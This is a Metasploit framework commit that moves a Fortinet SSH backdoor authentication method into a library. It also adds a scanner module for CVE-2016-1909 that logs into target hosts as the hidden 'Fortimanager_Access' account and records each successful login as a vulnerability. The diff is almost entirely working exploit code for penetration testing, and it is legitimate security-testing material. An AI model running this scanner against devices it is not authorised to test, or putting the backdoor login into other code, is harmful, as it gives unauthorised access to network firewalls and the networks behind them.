Move Fortinet backdoor to module and library

2016-02-27 18:19:14 -06:00 · 2016-02-27 18:19:14 -06:00 · 53d703355f
parent 83fad3e328
commit 53d703355f
3 changed files with 78 additions and 2 deletions
--- a/lib/net/ssh/authentication/methods/fortinet_backdoor.rb
+++ b/lib/net/ssh/authentication/methods/fortinet_backdoor.rb
@ -2,12 +2,14 @@

 # https://www.ietf.org/rfc/rfc4256.txt

+require 'net/ssh'
+
 class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract

  USERAUTH_INFO_REQUEST  = 60
  USERAUTH_INFO_RESPONSE = 61

-  def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
+  def authenticate(service_name, username, password = nil)
    debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }

    send_message(userauth_request(
--- a/lib/net/ssh/authentication/session.rb
+++ b/lib/net/ssh/authentication/session.rb
@ -7,7 +7,6 @@ require 'net/ssh/authentication/methods/publickey'
 require 'net/ssh/authentication/methods/hostbased'
 require 'net/ssh/authentication/methods/password'
 require 'net/ssh/authentication/methods/keyboard_interactive'
-require 'net/ssh/authentication/methods/fortinet_backdoor'

 module Net; module SSH; module Authentication

--- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/fortinet'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Fortinet SSH Backdoor Scanner',
+      'Description'    => %q{
+        This module scans for the Fortinet SSH backdoor.
+      },
+      'Author'         => [
+        'operator8203 <operator8203[at]runbox.com>', # PoC
+        'wvu'                                        # Module
+      ],
+      'References'     => [
+        ['CVE', '2016-1909'],
+        ['EDB', '39224'],
+        ['PACKETSTORM', '135225'],
+        ['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'],
+        ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
+      ],
+      'DisclosureDate' => 'Jan 09 2016',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options([
+      Opt::RPORT(22)
+    ])
+
+    register_advanced_options([
+      OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),
+      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
+    ])
+  end
+
+  def run_host(ip)
+    begin
+      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        Net::SSH.start(
+          ip,
+          'Fortimanager_Access',
+          port: datastore['RPORT'],
+          auth_methods: ['fortinet-backdoor'],
+          verbose: datastore['SSH_DEBUG'] ? :debug : nil
+        )
+      end
+    rescue Net::SSH::Exception => e
+      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
+      return
+    end
+
+    if ssh
+      print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")
+      report_vuln(
+        :host => ip,
+        :name => self.name,
+        :refs => self.references,
+        :info => ssh.transport.server_version.version
+      )
+    end
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+end